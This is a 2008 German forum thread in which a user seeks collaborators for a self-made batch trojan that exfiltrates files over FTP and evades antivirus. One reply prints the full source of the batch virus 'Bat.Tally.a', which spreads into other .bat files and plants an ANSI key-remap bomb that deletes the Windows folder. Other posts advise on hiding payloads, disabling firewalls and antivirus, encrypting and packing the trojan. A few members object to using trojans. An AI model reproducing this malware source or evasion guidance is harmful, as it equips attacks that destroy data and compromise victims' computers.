BAT Trojaner

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Neo_at_Matrix, 6. Juni 2008 .

Schlagworte:
  1. 6. Juni 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    Hey RRler,

    wollte mal auf cooperation anfrage und ein bisschen um hilfe bitten ! Suche noch ein paar leute mit denen ich das Tool mal testen bzw erweitern kann.

    Aber erstmal. Es ist kein naja richtig programmierter trojaner .... ich kann auch nicht programmieren... ich selber habe nur mit kommando befehlen gearbeitet. Das gute daran : Wenn der user das prog ausführt wird es von keinem AV erkannt. Eine "Remote" Controlle habe ich auch schon "eingebaut".

    Das Programm erstellt eine file worin alle dateien auf einem laufwerk gelistet und gepackt werden. Via einer antwortdatei kann man dann bestimmte files von dem rechner requesten. Das ganze kommunikation erfolgt dann über einen ftp server.

    Also wer bock hat kann hier ja mal posten oder mich per PN anschreiben.

    hier mal der "hauptteil" des programms

    Spoiler
    https://www.xup.in/dl,18018728/inetbot/

    edit:
    und bevor jemand sagt den darfst du nicht einsetzten auch wenn er funktionieren sollte ! Das weis nicht natürlich mir war einfach langweilig und dann habe ich mir sowas halt ausgedacht. Ich habe ihn auch noch an NIEMANDEN ausprobiert oder weitergegeben also .. ruhig blut !!!

    Quellcode will ich hier erstmal nicht veröffentlichen ... naja eigentlich isses ja auch gar keiner
    Ich habe jedoch nichts geklaut und habe es mir selbst ausgedacht.

    gerne nehme ich auch kretik hin sollange sie construtiv ist.
     
  2. 6. Juni 2008
    AW: BAT Trojaner

    ich würd mir diesen "bat-trojaner" ganz gerne mal anschauen. Wäre n1 wenn du mir mal nen link dazu per pm schicken könntest.
     
  3. 6. Juni 2008
    AW: BAT Trojaner

    würde das ding auch gern mal sehen, kannst es mir ja ma per pn schicken ...

    bb. master80
     
  4. 6. Juni 2008
    AW: BAT Trojaner

    gibt genug batch trojaner mit public source die das gleiche können , bevor ich jemand dazu bringe eine test.bat zu öffnen schiebe ich ihm lieber gleich einen richtig programmierten trojaner unter.ob du - ihr auf dauer mit batch spass haben werdet ? villeicht im schulnetzwerk und dann einen auf dicke hose machen. ich bin mal nicht so frei und poste hier den source nicht..
     
  5. 6. Juni 2008
    AW: BAT Trojaner

    Also ich würd die finger von Trojaner lassen
    Ob selbst Programmiert oder Publices

    Das ist erstmal extreme Kiddy haft und zweites können die vics schnell eine deine IP kommen
    @ cmd - netstats -n
    Und wen die erstmal deine ip haben dan können deine Victems Abuse verschiken
    Also lass die Finger davon

    Ansosten
    Programmiere mit Delphi Trojaner
    Source kannst du in Google suchen
    Die seite hieß glaub ich opensc oder so

    HF
     
  6. 6. Juni 2008
    AW: BAT Trojaner

    man muss das ding ja nich gleich auch seinem pc laufen lassen, wozu gibts ne vBox.

    kannst mir gern mal schicken und ich lass es auf ner vbox laufen.
     
  7. 6. Juni 2008
    AW: BAT Trojaner

    Kann ich bitte mal den Code von deinem so gennanten Bat-Trojaner sehen ? =)

    Mfg Alex²
     
  8. 6. Juni 2008
    AW: BAT Trojaner

    hey also erstmal danke für das feedback !

    @Frankie00rz

    ich bin kein scrip kiddie und auch nicht mehr 12 um es im schul netzt verbreiten zu können. Bin einfach ein netzwerktechniker der ein bisschen zu viel zeit hatte. Ich gebe dir recht das nen selbstgeschriebener trojaner besser ist aber da ich halt noch nicht richtig proggen kann scripte ich einfach. Im sinne von entdeckt werden ... naja meine ip bekommen sie nicht weil ich mit dem vic nicht direkt kommuniziere nur über eine antwort datei die per ftp geladen wird.


    an alle anderen ich schick euch mal nen auszug
    bzw stelle ihn hier rein !
     
  9. 6. Juni 2008
    AW: BAT Trojaner

    batch ist nur für erweiterte scann0r dinge nützlich , sowie automatisierungsprozesse , was gutes geht wohl nicht ohne c/++ , üben mit vb und co ist aber erlaubt , diesen habe ich noch gefunden
    Code:
    ECHO OFF
    REM Ansi/Bat.Tally.a
    REM By -KD- [Metaphase & NoMercyVirusTeam]
    REM Yup its new school with a new twist 2008!
    ECHO DEVICE=C:\WINDOWS\Command\ANSI.SYS>>c:\config.sys
    @ctty nul.tally
    for %%a in (*.bat ..\*.bat) do set tally=%%a
    find "tally"<%tally%
    if errorlevel 1 find "tally"<%0.BAT>>%tally%
    ECHO N TALLY.ANS>tally.t
    ECHO E 0100 40 45 43 48 4F 20 4F 4E 0D 0A 1B 5B 22 79 22 3B>>tally.t
    ECHO E 0110 22 6E 22 3B 31 33 70 0D 0A 1B 5B 22 59 22 3B 22>>tally.t
    ECHO E 0120 6E 22 3B 31 33 70 0D 0A 1B 5B 22 6E 22 3B 22 79>>tally.t
    ECHO E 0130 22 3B 31 33 70 0D 0A 1B 5B 22 4E 22 3B 22 79 22>>tally.t
    ECHO E 0140 3B 31 33 70 0D 0A 1B 5B 22 69 22 3B 22 6D 64 20>>tally.t
    ECHO E 0150 63 3A 5C 77 69 6E 39 78 22 3B 22 63 6F 70 79 20>>tally.t
    ECHO E 0160 63 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 20 63>>tally.t
    ECHO E 0170 3A 5C 77 69 6E 39 78 22 3B 22 64 65 6C 20 63 3A>>tally.t
    ECHO E 0180 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31 33>>tally.t
    ECHO E 0190 70 0D 0A 1B 5B 22 49 22 3B 22 6D 64 20 63 3A 5C>>tally.t
    ECHO E 01A0 77 69 6E 39 78 22 3B 22 63 6F 70 79 20 63 3A 5C>>tally.t
    ECHO E 01B0 77 69 6E 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C 77>>tally.t
    ECHO E 01C0 69 6E 39 78 22 3B 22 64 65 6C 20 63 3A 5C 77 69>>tally.t
    ECHO E 01D0 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31 33 70 0D 0A>>tally.t
    ECHO E 01E0 1B 5B 22 65 22 3B 22 6D 64 20 63 3A 5C 77 69 6E>>tally.t
    ECHO E 01F0 39 78 22 3B 22 63 6F 70 79 20 63 3A 5C 77 69 6E>>tally.t
    ECHO E 0200 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C 77 69 6E 39>>tally.t
    ECHO E 0210 78 22 3B 22 64 65 6C 20 63 3A 5C 77 69 6E 64 6F>>tally.t
    ECHO E 0220 77 73 20 2A 2E 2A 22 3B 31 33 70 0D 0A 1B 5B 22>>tally.t
    ECHO E 0230 45 22 3B 22 6D 64 20 63 3A 5C 77 69 6E 39 78 22>>tally.t
    ECHO E 0240 3B 22 63 6F 70 79 20 63 3A 5C 77 69 6E 64 6F 77>>tally.t
    ECHO E 0250 73 20 2A 2E 2A 20 63 3A 5C 77 69 6E 39 78 22 3B>>tally.t
    ECHO E 0260 22 64 65 6C 20 63 3A 5C 77 69 6E 64 6F 77 73 20>>tally.t
    ECHO E 0270 2A 2E 2A 22 3B 31 33 70 0D 0A 1B 5B 22 61 22 3B>>tally.t
    ECHO E 0280 22 6D 64 20 63 3A 5C 77 69 6E 39 78 22 3B 22 63>>tally.t
    ECHO E 0290 6F 70 79 20 63 3A 5C 77 69 6E 64 6F 77 73 20 2A>>tally.t
    ECHO E 02A0 2E 2A 20 63 3A 5C 77 69 6E 39 78 22 3B 22 64 65>>tally.t
    ECHO E 02B0 6C 20 63 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A>>tally.t
    ECHO E 02C0 22 3B 31 33 70 0D 0A 1B 5B 22 41 22 3B 22 6D 64>>tally.t
    ECHO E 02D0 20 63 3A 5C 77 69 6E 39 78 22 3B 22 63 6F 70 79>>tally.t
    ECHO E 02E0 20 63 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 20>>tally.t
    ECHO E 02F0 63 3A 5C 77 69 6E 39 78 22 3B 22 64 65 6C 20 63>>tally.t
    ECHO E 0300 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31>>tally.t
    ECHO E 0310 33 70 0D 0A 1B 5B 22 6F 22 3B 22 6D 64 20 63 3A>>tally.t
    ECHO E 0320 5C 77 69 6E 39 78 22 3B 22 63 6F 70 79 20 63 3A>>tally.t
    ECHO E 0330 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C>>tally.t
    ECHO E 0340 77 69 6E 39 78 22 3B 22 64 65 6C 20 63 3A 5C 77>>tally.t
    ECHO E 0350 69 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31 33 70 0D>>tally.t
    ECHO E 0360 0A 1B 5B 22 4F 22 3B 22 6D 64 20 63 3A 5C 77 69>>tally.t
    ECHO E 0370 6E 39 78 22 3B 22 63 6F 70 79 20 63 3A 5C 77 69>>tally.t
    ECHO E 0380 6E 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C 77 69 6E>>tally.t
    ECHO E 0390 39 78 22 3B 22 64 65 6C 20 63 3A 5C 77 69 6E 64>>tally.t
    ECHO E 03A0 6F 77 73 20 2A 2E 2A 22 3B 31 33 70 0D 0A>>tally.t
    ECHO RCX>>tally.t
    ECHO 02AE>>tally.t
    ECHO W>>tally.t
    ECHO Q>>tally.t
    debug<tally.t>nul
    del tally.t
    type tally.ans
    del tally.ans
    ctty con.tally
    
     
  10. 6. Juni 2008
    AW: BAT Trojaner

    hab mal das main programm als code geuppt. mal sehen wie ihr es findet. Ich weis das am ende eine Variable falsch gesetzt ist aber das ist absicht !

    Greetz
     
  11. 6. Juni 2008
    AW: BAT Trojaner

    was heist hier üben? vb hat sehr wohl seine daseinsberechtigung und vor allem geht darin nen privattrojaner effektiver zu proggen als in c/cpp. effektivität = leistung / zeit

    btt:
    C:\remotebot > genialster pfad für shadcode - ever - selbst temp

    btw ist das doch blos nen starter für nen trojaner und da warum nimmste da kein selbstentpackendes archiv, anstatt die vorhandenheit von winrar (!anhand des ordners!) zu checken.
     
  12. 6. Juni 2008
    AW: BAT Trojaner

    wie gesagt bin für verbesserungen offen.

    ausserdem sagte ich ja es ist das main programm wie du sagtest der loader
     
  13. 6. Juni 2008
    AW: BAT Trojaner

    Ohne dir jetzt was zu wollen....
    1. BATCH-Dateien sind wirklich viel zu leicht auszulesen, als das sie sich für nen Trojaner eignen würden (Rechtsklick -> öffnen mit -> Editor reicht ja schon), dem kann man aber nachhelfen
    2. wirst du in nen BATCH Trojaner niemals wirklich gute Funktionen reinkriegen höchstens über externe calls von Programmen die du alle beilegen musst...
    3. Pfad ändern - am besten im System32 Verzeichnis die Files temporär ablegen da schaut echt so gut wie nie jemand rein - ausser er hat PC Probleme....


    MFG
    TuXiFiED
     
  14. 7. Juni 2008
    AW: BAT Trojaner

    Wo ist da der Unterschied, ob nen BAT Trojaner oder einer in VB/Delphie usw ? Bei beiden kannst du so einfach die IP rausbekommen... (oder die DNS -> dadurch wieder die IP)...

    Also war das grat net sinnvoll Man muss dern Trojaner wenn dann über nen Server laufen lassen... Oder anderweitig "tunneln"...

    Aber was sage ich... Trojaner sind eh fürn ***** und total dumm... Aber wenn ihr mit sowas spielen wollt, dann viel Spaß
     
  15. 7. Juni 2008
    AW: BAT Trojaner

    Natürlich sind irgentwelche 0815 Trojaner dumm, aber wenn du selbst einen schreibst ist es wohl die einfachste möglichkeit z.B jmd im ICQ damit zu "hacken"(ja ich weis, dass es kein hacken ist). Wenn er nicht grad ne andere Vulnerability aufweist.
    Komplett sinnlos sind sie also nicht, da nur jedes Kiddie die Teile benutzt vll etwas vorbelastet =).

    Mfg Alex²
     
  16. 7. Juni 2008
    AW: BAT Trojaner

    Sagt ein 16-Jähriger ahnungsloser. Es gibt vielleicht 0,01 % der Vics, die deine IP rausbekommen, mit dem simplen Befehl. Eben schreibst er soll die Finger davon lassen "Ob selbst Programmiert oder Publics" und dann sagst du:

    "Ansosten
    Programmiere mit Delphi Trojaner
    Source kannst du in Google suchen
    Die seite hieß glaub ich opensc oder so"

    Verstehe deine Logik net so ganz.

    Zu der Bat: Ich glaube nicht so ganz dass du die ganze Bat selbst erstellt hast, ich mein ist ja nich verboten da nen public code mit einzubauen, aber die Idee ist ganz nice.

    greeZ kuhjunge
     
  17. 7. Juni 2008
    AW: BAT Trojaner

    Ahja....
    1.1 hat so gut wie jeder Trojaner (public - private erst recht...) ne Injection, womit keine Firewall mehr anschlägt.
    1.2 Haben viele Trojaner nen eingebautes Rootkit wodurch dann netstat rein garnix bringt weil die Verbindungen - Prozesse - Dateien - Handles hidden sind.
    Und so gut wie jedes "Opfer" welches den Trojaner ausführt wird wohl kaum nen Anti-Rootkitscanner durchlaufen lassen, da diese Personen meist nicht besonders viel Ahnung von PCs haben.
    2.1 Dafür müsste er Delphi erst ein mal RICHTIG beherrschen (zumindest Winsocks für die Verbindung + viele weitere Funktionen für die ganzen Registryeinträge ... )
    2.2. Public Source kompilieren wird ihm wohl kaum was bringen da der zu 99,9% bereits detected ist und ohne das passende Hintergrundwissen wird er den wohl kaum so stealthen/hexen oder umprogrammieren können, das er nicht erkannt wird.

    siehe 1.2
    FULL ACK.
    Mehr gibt's dazu nicht zu sagen.

    MFG
    TuXiFiED
     
  18. 7. Juni 2008
    AW: BAT Trojaner

    Offtopic alarm

    @wollte mal auf cooperation anfrage und ein bisschen um hilfe bitten ! Suche noch ein paar leute mit denen ich das Tool mal testen bzw erweitern kann.

    also hat jetzt jemand von euch bock mitzuhelfen oder nicht , grundsatzdiskussionen waren garnicht thema das treads...
     
  19. 7. Juni 2008
    AW: BAT Trojaner

    @ TuXiFiED
    Viele heißt nicht jedes rat hat ein Rootkit

    Würd trozdem die finger von lassen
     
  20. 7. Juni 2008
    AW: BAT Trojaner

    verbesserungsvorschlag: hau dir ne set-encryption rein und compile es ggf. zu einer .exe

    mfg black.

    btw nicht viel ahnung von pc:

    @ tuxified: hast du überhaupt nen plan was du immer so laberst?^^
     
  21. 7. Juni 2008
    AW: BAT Trojaner

    Und ggf. noch packen falls sie zu groß ist - z.B. mit UPX.

    Kannst ja mal quoten was du zu beanstanden hast, kann sein das ich mich bei VB/Delphi bissel vertan habe da ich die beiden Sprachen nicht beherrsche aber generell ist es doch recht sinnig wenn ein Trojaner Autostarteinträge erzeugt, nen Rootkit sowie ne Injection beeinhaltet oder?
    Und wenn das eingebaute Rootkit die Verbindungen versteckt wirst du sie mit netstat auch nicht sehen, logisch oder?
     
  22. 7. Juni 2008
    AW: BAT Trojaner

    wow hätte nicht gedacht hier so eine welle los zu treten.

    Wie bereits gesagt wurde es dient nur mal so aus spass und um zu schauen ob es funzt.
    Firewalls kann ich mit dem prog auch umgehen. Ich lasse einfach den angemeldeten user die firewall oder AV killen. dank nircmd geht das. Desweiteren wenn dieses tool mit nircmd ausgeführt wird ist es automatisch unsichbar und läuft nur noch im hintergund ab. also nicht ganz so dumm .

    Hm was noch... naja ich kann halt auch immer wieder mein prog upaten oder ihn mit aktuellen befehlen versorgen halt nur das ich auf das neue ausführen warten muss.
    Das diese file leicht auszulesen ist geb ich allen schreibern recht ! Packen jedoch aufgrund eines größen problems brauche ich nicht .. ich mein die files die ich brauche sind insgesammt villeicht mal 12kb groß also nicht die welt !
     
  23. 8. Juni 2008
    Zuletzt von einem Moderator bearbeitet: 13. April 2017
    AW: BAT Trojaner

    Lol, du sagst die 0815 sind dumm... Aber die selbstprogrammierten sind "besser" um vllt jmd das ICQ zu "hacken"? Der Einsatz von Trojanern ist also nicht sinnlos? Junge werd erstmal erwachsen... Wo liegt der Sinn jmd das ICQ zu hacken? Geht dir da derb einer ab oder was? Macht dich das geil? Denkst du, dass du dadurch Macht bekommst? Und für was willst du nen Trojaner sinnvol einsetzen? Wenn du nen PC Administrieren willst, dann geht das mit anderen Tools, die das gleiche können. Und das wäre vllt noch der einzige sinnvolle Einsatz... Aber auch nur vllt....

    Einfach unfassbar wie manche Leute hier von ihrern Trojanermachenschaften überzeugt sind.........

    @ TuXiFiED : Zeig mir, sagen wir mal 10 User im RR, die in ihre Trojaner nen Rootkit einbauen... Wird wohl eher sowas von selten sein.......
     
  24. 8. Juni 2008
    Zuletzt von einem Moderator bearbeitet: 13. April 2017
    AW: BAT Trojaner

    Ich redete davon es ihm per ICQ zu verabreichen =) . Was man dann damit macht ist ne andere Sache, dass war ein simples Beispiel. Ich selbst nutze keine Trojaner o.ä. ! Deine Beileidigung kannst du dir sparen =). Solch eine Ausdrucksweise lässt auch nicht auf ein hohes geistiges Alter schließen, wie wäre es, wenn du dein Wissen mal Konstruktiv benutzt ?
    Wieso gehst du direkt so ab, auch wenn ich zugebe das ICQ ein dummes Beispiel war. =)
    Es geht einfach nur darum, dass man die Teile schon verwenden kann. Obwohl jetz wo ich nachdenke raadmin würde es auch tun.

    Die Definition von Trojaner ist auch nicht *haha lolol ich mach den bildschirm vom anderen schwarz* wenn ich mir jetz einen schreibe der z.B mein Ftp-server auf dem Ziel Rechner installiert was daran ist bitte dann so schlimm ?
     
  25. 8. Juni 2008
    AW: BAT Trojaner

    btw , konnte jemand meinen geposteten source mal testen um zu sagen was der trojaner macht ?
    Interessant ist das Thema alle mal , nur behaupte ich von mir selbst , sowas einzusetzen ist absolute schei... egal ob gegen freunde-feinde-ex-frau oder sonst wen , einfach nur unterste schublade.
    Die meisten funny trojaner und viren richten grossen schaden an oder kommen zu leicht in hände von kindern.
     
  26. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.